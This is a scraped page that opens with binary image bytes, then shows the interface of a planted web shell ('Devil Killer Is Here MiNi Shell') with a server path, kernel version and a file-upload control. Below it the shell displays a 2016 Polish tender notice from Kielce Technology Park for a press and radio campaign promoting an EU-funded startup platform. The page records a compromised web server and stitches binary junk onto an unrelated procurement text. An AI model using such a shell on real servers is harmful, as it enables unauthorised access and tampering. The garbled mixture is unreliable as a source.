JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160909/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160909/306991-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 306991 - 2016
              z dnia 2016-09-09 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kielce: Realizacja kampanii informacyjno - promocyjnej projektu Platforma Startowa TechnoparkBiznesHub<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Zamówienie realizowane w ramach projektu pn. Platforma Startowa TechnoparkBiznesHub. Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego w ramach osi priorytetowej I: Przedsiębiorcza Polska Wschodnia, działania 1.1 Platformy startowe dla nowych pomysłów, Poddziałania 1.1.1 Platformy startowe dla nowych pomysłów Programu Operacyjnego Polska Wschodnia 2014-2020 (POPW).</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Kielecki Park Technologiczny, krajowy numer identyfikacyjny
              26022184000000, ul.
              ul. Olszewskiego 
              6,
              25663  
              Kielce, woj.
              świętokrzyskie, państwo
              , tel.
              41 278 72 00, e-mail
              szymon.mazurkiewicz@um.kielce.pl; technopark@um.kielce.pl, faks
              41 278 72 01.
              <br />
              Adres strony internetowej (URL): www.bip.technopark.kielce.pl <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Jednostka organizacyjna JST</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.bip.technopark.kielce.pl/pl/przed/zamowienia_publiczne</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.bip.technopark.kielce.pl/pl/przed/zamowienia_publiczne</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty muszą być skłaane w formie psemnej<br />
                Adres:
                <br />KIELECKI PARK TECHNOLOGICZNY ul. Olszewskiego 6, 25-663 KIELCE</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Realizacja kampanii informacyjno - promocyjnej projektu Platforma Startowa TechnoparkBiznesHub<br /><b>Numer referencyjny: </b>KPT-DIIA.270.1.9.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>W ramach wykonania zamówienia Wykonawca zobowiązany będzie do przeprowadzenia działań w prasie i radiu (zwanych dalej Kampanią) na opisanych poniżej warunkach.
Wykonawca zobowiązany będzie do przeprowadzenia zadań (działań informacyjno-promocyjnych):
1.	Zadanie I - Kampania prasowa
1) W ramach realizacji zadania - Wykonawca opracuje, zgodnie z wytycznymi Zamawiającego, 3 publikacje prasowe zwane dalej Publikacjami.
2) Publikacje będą miały formę artykułu sponsorowanego. 
3) Kampania prasowa realizowana będzie w prasie opiniotwórczej oraz branżowej o zasięgu ogólnopolskim, której wiodącymi tematami są: startupy, innowacyjność oraz nowoczesne technologie.
4) Wykonawca przekaże Zamawiającemu projekty Publikacji w pliku pdf w terminie 15 dni roboczych przed planowaną datą emisji, zgodnie z zaakceptowanym przez Zamawiającego Planem kampanii. Zamawiający w terminie 2 dni roboczych od otrzymania projektu zgłosi ewentualne zastrzeżenia. Wykonawca w terminie 2 dni roboczych od momentu wniesienia przez Zamawiającego ewentualnych zastrzeżeń, naniesie stosowne poprawki i przekaże projekt do powtórnej akceptacji.
5) Zaakceptowane Publikacje zostaną opublikowane w 3 różnych terminach, każda w nie mniej niż 2 magazynach/czasopismach o zasięgu ogólnopolskim i średnim miesięcznym nakładzie nie mniejszym niż 2.500 egzemplarzy.
6) Dodatkowo Zamawiający oczekuje, że Publikacje zostaną zamieszczone w elektronicznych wersjach ww. magazynów/czasopism i będą dostępne dla czytelników przez okres min. 30 dni kalendarzowych.
Wymogi w zakresie Publikacji:
a) format nie mniejszy niż  strony głównego grzbietu wydawnictwa lub dodatku tematycznego do wydawnictwa,
b) tekst publikacji: minimum 3000 znaków (bez spacji), krój i wielkość czcionki tożsamy z materiałem tekstowym wydawnictwa, w którym Publikacja zostanie opublikowana,
c) zastosowanie co najmniej 1 elementu graficznego (grafika i/lub zdjęcie) zgodnego z zasadami księgi CI Projektu, wielkość elementu graficznego minimum 15 % powierzchni artykułu,
d) druk w pełnym kolorze (CMYK),
e)	terminy publikacji zgodnie z zaakceptowanym przez Zamawiającego Planem Kampanii,
f)	wersja elektroniczna Publikacji dostosowana wg standardów wydawnictwa. 
7)	Wszelkie koszty związane z opublikowaniem Publikacji ponosi Wykonawca.
8)	W ramach potwierdzenia wyników kampanii, Wykonawca przedstawi Zamawiającemu:
a)	potwierdzenie liczby sprzedanych egzemplarzy magazynu/czasopisma, w którym opublikowane zostały Publikacje, 
b)	po 3 egzemplarze magazynu/czasopisma, w którym opublikowane zostały Publikacje,
c)	zrzut z ekranu witryny internetowej, na której opublikowana została Publikacja.
9)	Dokumenty, o których mowa w pkt. 1. ppkt. 
10) stanowić będą jedną z podstaw dokonania przez Zamawiającego odbioru Zamówienia.

2.	Zadanie II - Kampania radiowa
1)	W ramach realizacji zadania Wykonawca opracuje 1 (jeden) spot radiowy, zgodnie z wytycznymi Zamawiającego.
2)	Zaakceptowany spot zostanie wyemitowany w sieciowych rozgłośniach radiowych z regionalną odsłoną posiadających największy zasięg terytorialny na terenie 9 (dziewięciu) województw o największej liczbie uczelni wyższych z pominięciem województw Polski Wschodniej tj. warmińsko-mazurskiego, podlaskiego, lubelskiego, świętokrzyskiego, podkarpackiego. 
3)	Spot musi zawierać informacje o Kieleckim parku Technologicznym jako animatorze projektu Platforma Startowa TechnoparkBiznesHub.
4)	Spot musi być opatrzony informacją o sfinansowaniu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego, Program Operacyjny Polska Wschodnia, Oś Priorytetowa I  Przedsiębiorcza Polska Wschodnia Działanie 1.1 Platformy startowe dla nowych pomysłów, Poddziałanie 1.1.1 Platformy startowe dla nowych pomysłów. Projekt: "Platforma Startowa - TechnoparkBiznesHub". 
5)	Minimalna liczba spotów w jednym województwie:  30 (słownie: trzydzieści) spotów.
6)	Czas trwania pojedynczego spotu: 30 (słownie: trzydzieści) sekund.
7)	Termin emisji spotu: emisja spotu realizowana będzie w okresie od poniedziałku do piątku w godzinach najwyższej słuchalności wg wcześniej zaakceptowanego przez Zamawiającego Planu Kampanii. Minimum 60% emisji musi odbywać się w ciągu 10 minut przed pełnymi serwisami informacyjnymi. 
8)	Scenariusz spotu: Wykonawca przygotuje i przedstawi Zamawiającemu propozycję treści spotu opracowaną zgodnie z założeniami koncepcji Kampanii.  
9)	Ścieżka dźwiękowa i lektor: Wykonawca zapewni ścieżkę dźwiękową i lektora do realizacji spotu 
w uzgodnieniu i akceptacji z Zamawiającym. Spot radiowy oraz jego elementy powinny zostać wyprodukowane w profesjonalnym standardzie i jakości wymaganej przy emisji spotów przez rozgłośnię radiową o zasięgu ponadregionalnym.
10)	Sposób przekazania materiałów: Wykonawca dostarczy Zamawiającemu na 14 dni przed emisją gotowe nagranie spotu na płycie DVD/CD w formacie umożliwiającym jego emisję w innej stacji radiowej o charakterze regionalnym i ponadregionalnym.
11)	Emisja musi zostać zapewniona w rozgłośniach radiowych, które:
a)	zasięgiem obejmują co najmniej teren całego województwa wybranego do przeprowadzenia kampanii,
b)	posiadają udokumentowany zasięg dzienny,
c)	posiadają udokumentowaną słuchalność ogólną w dni powszednie, powyżej 3 proc. w okresie styczeń-sierpień 2016 r. 
a)	W ramach potwierdzenia wyników kampanii, Wykonawca przedstawi Zamawiającemu tzw. ostatnią falę słuchalności = zasięg w grupie (tzn. ilość osób, do których dotarła emisja spotu reklamowego) oraz raport z emisji spotów. 
<br /><br /><b>II.5) Główny kod CPV: </b>79341200-8<br /><b> Dodatkowe kody CPV:</b>79341100-7,
                79340000-9,
                79341400-0,
                79416000-3,
                92210000-6,
                79342200-5<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/04/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Na potwierdzenie należy złożyć: oświadczenie zgodnie z założeniami w pkt. 9.3.  Zamawiający w tym zakresie nie stawia żadnych wymagań.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Na potwierdzenie należy złożyć: oświadczenie zgodnie z założeniami w pkt. 9.3.  Zamawiający w tym zakresie nie stawia żadnych wymagań<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Na potwierdzenie należy złożyć:
a) wykonanych usług
Na potwierdzenie należy złożyć: wykaz usług wykonanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy.

Dla Zadania nr 1
Zamawiający uzna warunek za spełniony jeżeli Wykonawca, wykaże, że w tym okresie wykonał usługę, która obejmowała: realizację kampanii prasowej (informacyjno-promocyjnej) projektu zrealizowaną w ramach jednej umowy lub w ramach kilku (max. 10) oddzielnych umów o wartości sumarycznej nie mniejszej niż 40 000,00 PLN brutto. 
Do wykazu należy załączyć dowody określające czy usługi te zostały wykonane w sposób należyty.

Dla Zadania nr 2
Zamawiający uzna warunek za spełniony jeżeli Wykonawca, wykaże, że w tym okresie wykonał usługę, która obejmowała: realizację kampanii radiowej (informacyjno-promocyjnej) projektu zrealizowaną w ramach jednej umowy lub w ramach kilku (max. 10) oddzielnych umów o wartości sumarycznej nie mniejszej niż 50 000,00 PLN brutto. 
Do wykazu należy załączyć dowody określające czy usługi te zostały wykonane w sposób należyty.

b) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego
Na potwierdzenie należy złożyć: wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
Wykonawca potwierdzi spełnianie niniejszego warunku udziału w postępowaniu, jeżeli wykaże, że dysponuje:

Dla Zadania nr 1
minimum 1 osobę z wykształceniem  wyższym, posiadającą doświadczenie zawodowe obejmujące udział 
w wykonaniu, co najmniej 2 kampanii prasowych w tym, co najmniej jedna kampania informacyjno-promocyjna projektu w charakterze autora lub współautora. 


Dla Zadania nr 2
minimum 1 osobę z wykształceniem  wyższym, posiadającą doświadczenie zawodowe obejmujące udział 
w wykonaniu, co najmniej 2 kampanii radiowych w tym, co najmniej jedna  kampania informacyjno-promocyjna projektu w charakterze autora lub współautora. 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 1 ustawy, wykonawca złoży oświadczenie o braku podstaw wykluczenia oraz przedłoży na potwierdzenie następujące dokumenty;
a)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt.1 ustawy;
9.4.5	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa powyżej w pkt. 9.4.4, składa odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,

b)	Dokumenty, o których mowa powyżej w pkt. a) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

c)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub w kraju, w którym miejsce zamieszkania mają osoby, których dotyczy dokument, wskazany nie wydaje się dokumentu, o których mowa w pkt. a) zastępuje się je dokumentem zawierającym oświadczenie, odpowiednio wykonawcy, ze wskazaniem osób uprawnionych do jego reprezentacji, lub oświadczeniem tych osób, złożonym przed notariuszem lub przed właściwym - ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tych osób - organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego. Przepis pkt b) stosuje się odpowiednio.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Opis warunków podmiotowych i sposobu dokonywania oceny spełniania tych warunków oraz braku podstaw do wykluczenia;	
9.4.1	kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów:
 	Na potwierdzenie należy złożyć: oświadczenie zgodnie z założeniami w pkt. 9.3.  Zamawiający w tym zakresie nie stawia żadnych wymagań.
9.4.2	zdolności technicznej lub zawodowej wykonawcy:
Na potwierdzenie należy złożyć:
a) wykonanych usług
Na potwierdzenie należy złożyć: wykaz usług wykonanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy.

Dla Zadania nr 1
Zamawiający uzna warunek za spełniony jeżeli Wykonawca, wykaże, że w tym okresie wykonał usługę, która obejmowała: realizację kampanii prasowej (informacyjno-promocyjnej) projektu zrealizowaną w ramach jednej umowy lub w ramach kilku (max. 10) oddzielnych umów o wartości sumarycznej nie mniejszej niż 40 000,00 PLN brutto. 
Do wykazu należy załączyć dowody określające czy usługi te zostały wykonane w sposób należyty.

Dla Zadania nr 2
Zamawiający uzna warunek za spełniony jeżeli Wykonawca, wykaże, że w tym okresie wykonał usługę, która obejmowała: realizację kampanii radiowej (informacyjno-promocyjnej) projektu zrealizowaną w ramach jednej umowy lub w ramach kilku (max. 10) oddzielnych umów o wartości sumarycznej nie mniejszej niż 50 000,00 PLN brutto. 
Do wykazu należy załączyć dowody określające czy usługi te zostały wykonane w sposób należyty.

b) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego
Na potwierdzenie należy złożyć: wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
Wykonawca potwierdzi spełnianie niniejszego warunku udziału w postępowaniu, jeżeli wykaże, że dysponuje:

Dla Zadania nr 1
minimum 1 osobę z wykształceniem  wyższym, posiadającą doświadczenie zawodowe obejmujące udział 
w wykonaniu, co najmniej 2 kampanii prasowych w tym, co najmniej jedna kampania informacyjno-promocyjna projektu w charakterze autora lub współautora. 


Dla Zadania nr 2
minimum 1 osobę z wykształceniem  wyższym, posiadającą doświadczenie zawodowe obejmujące udział 
w wykonaniu, co najmniej 2 kampanii radiowych w tym, co najmniej jedna  kampania informacyjno-promocyjna projektu w charakterze autora lub współautora. 

9.4.3	sytuacji ekonomicznej lub finansowej:
Na potwierdzenie należy złożyć: oświadczenie zgodnie z założeniami w pkt. 9.3.  Zamawiający w tym zakresie nie stawia żadnych wymagań.

              Uwaga 4
